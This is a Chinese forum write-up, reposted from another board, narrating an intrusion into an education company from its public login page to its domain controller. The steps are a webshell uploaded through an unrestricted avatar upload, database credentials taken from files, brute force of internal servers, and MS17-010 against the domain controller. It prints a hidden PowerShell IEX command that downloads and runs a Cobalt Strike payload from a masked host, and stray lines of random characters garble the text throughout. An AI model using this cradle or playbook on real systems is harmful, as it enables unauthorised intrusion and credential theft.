4 |3 H1 N o4 M9 W0 I! ]) B
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
3 q9 _" ]5 P+ R. y) n
3 A |' A2 ]/ D
3 u1 r0 ? a: W3 G ! g# X7 F" X( p, @: k, {+ R3 n
) }/ |" W8 Y( k
* Z: x; S3 p+ A* ~9 T* E+ ^
正文
! f# Z5 X5 N, I 6 P( Q# I( P X T* y; P) B
! w5 {, A% a$ O) h' X: C" c f
- s" K$ f" S. {
9 R3 I' F! h w1 O1 T' _$ g
" s& K' j7 f6 [3 v- X 目标:www.xxxx.com(一家教育机构) % }# j1 r( K' V$ E* N$ i* X% l
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能" x* n+ I2 Q4 A0 d& G; e
, w' u, b. k& B& ^1 Q$ s$ m
^- Q" j; c& W1 l + k5 p; d' I* @: s) w
; a5 T$ E L1 k1 |8 E
. s% S% t% |' ^4 ~8 k7 o 进行了简单的信息搜集 4 ]. a. Q6 H; |- w6 m! @
& }2 c" f+ J6 h1 r1 V9 Y
2 l2 p' h6 A7 C& v4 m% V$ L
6 W& {* c2 O! q
) S5 i& P) h8 `1 c7 F( i 子域名搜集; B* P: H$ w9 Z
! i' Y3 w) }6 {) X* A
2 z% X/ O2 N8 J
" R+ N/ t# {2 i2 u
. x, H* H2 o; \5 S! T! ^& \4 {
fofa找资产
& X; x+ ]" L2 D+ q
" R3 ?6 s b, g! f1 L6 K$ H: \6 G7 _3 b% D
. [. P" l6 }! A/ b" |+ s Q: I/ Y
+ n7 ~3 w( V0 X$ g
0 \$ ~; C% F. J7 a1 ?4 V. A- a
g6 T1 y5 i/ E% y; T# `, m s1 ^+ o2 u* R! L& V
一共七个资产。去重之后只有两个。 4 J8 i9 w9 i0 y6 h: j5 t
1 E4 n8 Z. X% \$ s
9 H% d2 i5 O1 [& K" z7 ? 0 G# z8 h+ M: h- R( @% }$ e# p: J
: H/ i! ~7 m- L" n/ e9 j7 {$ L
目录探测# Q9 r+ _ g2 K$ o V
, y4 p3 o4 H/ D. q) ~, ]
" r& P5 P! d+ H. S6 w1 O
- V: w6 c$ w1 V; p7 t6 ?; v$ }6 \5 Q
s6 x6 k" r; D
3 F* x6 C6 M* z
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
6 h4 K. `! [& } / K/ j& m8 {/ }6 E+ g
" r7 |, i A9 `9 L
^. V7 | u: x4 q" R. i
" n8 w5 m4 `& ]9 Q
我又尝试了通过修改返回包来绕过登录界面
0 H" r9 l2 w" p% I' M" |. c
% _0 q" e; j0 a' X# k" o- j5 X: Z7 B6 `/ W; Q% V
9 A2 @4 E; [- v0 p. t7 u
7 |. Q* h! O p) v+ [
7 n: N2 g \1 I+ a
还是不行,尝试注入无果
4 P; ^3 o/ U: d$ \. G 5 Y3 F# X( h. ]' V4 P
m% y7 ~& h8 p! R8 F: Q
) u0 z) S- q( W . D: ?) W" {6 Q- G [' K
. b$ v7 n/ T: O. i! O
不过我目录探测出了一处Spring信息泄露 / A0 q/ d4 p5 J
/ h0 ^! _8 q% d
* g5 `: G' @9 Z( m" ? / E- M) \/ Y: z6 r2 H" Q0 ^
5 }% R8 Z) [7 z+ _! r; ~3 B 8 Q: n+ k$ m) k; I, B
4 T/ R( P4 v$ a, ~6 R$ U5 Q
% U6 v" u2 m2 t3 b 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录% O% z3 p( k* i5 f& A
! u% h9 _, \5 h( M# B
8 v- t9 }, h K! L6 M
E5 Q0 x# i& p9 Q' `- q5 o, [4 x
% @9 w. V; ^! [% S6 x7 T
/ L( o3 w3 i2 i1 V s: r! v 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。- S0 R4 |" c- K* Z0 ]$ y' W" r
6 r( y) F+ P4 T8 V" h9 `. |) k5 t$ T- t, y4 ]& e
5 P, N, L9 a6 k' p
/ L3 i9 q, {8 m7 }8 u
" ?! q% q2 p$ `, @- Z. v
获取有些师傅到这一步就手机抓包电脑测了。* c) J: J6 a0 T% P- a7 n
# U u; @/ G9 Z0 B1 z# o. K
$ s* {$ X& L9 R5 O7 S& H2 b Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
% u# k i" m6 u% h" Q% m& H6 I4 ?8 h . P5 Q, J$ n. z
. M! L7 w- S+ m7 u3 P
其中在一个公众号发现了小程序,可以进行注册。
, u3 h: w& I( o
& u9 W) H' q1 z$ G; f. X! T0 U/ h& S1 L$ r, R3 q
看到了头像上传,尝试上传获取WebShell
: H6 @/ S A) M! J1 t. M5 }. U1 Y / L8 g& C5 p8 u# g% m- t) n
7 k! t" N0 Y$ P6 e$ j" \- P
/ o; f9 w& e/ S/ y# j$ b & o1 U/ R% n3 |" a1 O# @3 V
4 ]. |5 N1 A- b
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
3 E; H# G3 v# ^
& c7 T, D% X0 Q. p7 ~8 }$ r. t4 k$ T6 Z, e. X4 `; k2 a
2 j. u4 r* ?1 v( g; t$ O- z8 c
6 K/ j S. _$ i) g8 b( Z6 I+ ` h# X4 B* q8 Q
然后上了大马! h( v7 b+ U# [( w) C) P- `
/ U) g* {+ A" ^0 I) J G- h5 z9 B& P# x+ o
8 @" T, Y( B. l& z$ a
1 H( H9 M, ^: L S
- G" i7 [* B+ I& ~3 T' b, H * Z0 s6 S: Y+ H5 M
! V2 B" q. J, d9 D
# }: L/ z& O3 C$ U; _; C
通过翻找文件发现数据库账号密码
$ n2 W/ v( ?+ \% {: y6 n( G' L$ ? ! Q+ @* b' F; l9 W' |
7 F3 u6 [1 W4 F5 ^
" ^5 c: \8 L- s+ C& s4 M ' T0 F2 o$ I# q* q/ C3 l+ i
9 V% Z0 T5 n7 h4 b! e3 C9 m --内网渗透4 ~1 G- B& k4 H3 y! h
, y) ]- b7 d5 B/ o7 R/ e$ m/ T1 u1 F; v5 L! B5 b+ Q. F
直接通过powershell执行 cs上线
! D; `/ T: B8 o- J* C# P2 P
; Z! L) K+ S) u9 d
$ ~; ?' ~( Z$ P# G7 x. x$ }0 T powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"" \, P: p* W6 A/ f8 Y0 w
4 Q" I5 S4 e! X: N, B* s8 }# }5 N) P7 i! R) F1 T9 n( S
1 A; R9 l- r I* q/ D6 S
7 V6 k! A7 N+ A: u
4 F5 M9 Y: l+ z0 o; |
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
; m8 y5 t1 B. [* n* g ?, a' D& [
$ O/ [: Y% r% O1 L1 H6 B
8 {( J' @, t. t; e/ R
- _" j$ Q+ M& g# _2 a5 N; j' ? 1 ^% {" `! E9 G9 O1 P4 A
+ t- E; W" i' }" U8 n. H6 O5 r
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 - }0 n# l& a3 _/ D p/ {
6 U+ x! K' F4 @& @# X$ z' ]) A
, A( `# H- C! a3 G( s8 g4 o4 J" m- G! o! @7 ?9 p3 }
3 i. v. i8 _% t* u, `2 T
/ R3 M! U o$ X
4 T; D+ H( [9 e( {' s8 P/ E
( u8 `5 n8 d, j) c1 e* T& K6 z0 H" X, O8 n" ^, a
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
& z6 o* Q" n3 I7 _ + j. g1 V, A. ~& f( c b# Q' a* i# k
& s9 Q$ x) e8 R# D
; a( H$ G- a" G- T `* A+ z9 N! A z5 O: R) y+ }% r
) ]) c2 [* x5 `. \& a+ V ' \) _- |/ V( `% M. V+ [
' t- A) Q! X: M 9 T# H W4 w& @& w1 l9 i w
- w3 x+ M0 M+ y( K
3 p& f3 g8 [6 K2 e/ @- y
K) x$ @( r' O& i
' G4 v6 o0 S$ }" e
$ U: Z# {; q* ]8 Y, d 8 X! i0 c3 M( Z' C9 y, X! y
. e# L7 Q: j) J* V+ {- s( ]
小结
A6 ?1 O; ?9 L% T
; N" G+ K6 x( x$ R E4 w9 X4 @2 ^. H
3 `1 q/ p& c2 P( [+ e" f6 F - c. K, r( Y) X" P% A$ U
, ~& o+ S) P3 K; |9 S3 I6 D- e5 {/ O3 ^& F- z& d. Z# r1 f/ k/ [
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!% t/ {& J2 h0 a* |) L
; k7 P, A# r: C6 n3 L4 I% E* n+ z# A0 |
; T8 }& P& Y0 _7 c6 N: j# }/ B
+ D2 O% s' X! y9 H2 K/ K9 B: I5 q$ W8 J
- ! n; t7 F; B/ y6 h
' x* W0 W8 H" R% N; r! O
- ]7 t1 Z4 o% L' }
-
' p# ^! L1 m6 E9 T# m2 M 0 I5 O3 a+ V( M2 f. Q% J f
- o' r4 i5 q" z* K
" ^+ F/ g( g) v' r# `" D- O2 L
! I7 C3 ?- |4 e9 H8 w, ^/ s 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
; G t2 J: P" E
, |2 g) T0 U, |# [. p: M0 u; r3 B" A7 g
' x7 [6 R$ `( R0 k h3 w
|